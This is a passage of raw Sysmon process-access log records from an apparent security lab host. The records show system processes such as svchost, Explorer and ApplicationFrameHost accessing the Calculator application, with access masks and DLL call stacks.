Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14517|C:\Windows\System32\CapabilityAccessManagerClient.dll+141f0|C:\Windows\System32\CapabilityAccessManagerClient.dll+151b5|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362091Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362090Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362089Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362088Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362087Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362086Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362085Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362084Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362083Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362082Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362081Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362080Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362079Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362078Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362077Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362076Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362075Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-337a-6013-7e02-000000001100}63045600C:\Windows\system32\ctfmon.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\MSCTF.dll+328e0|C:\Windows\System32\MSCTF.dll+31adc|C:\Windows\System32\MSCTF.dll+3176f|C:\Windows\System32\MSCTF.dll+315d2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362074Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362073Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362072Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362071Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362070Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362069Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\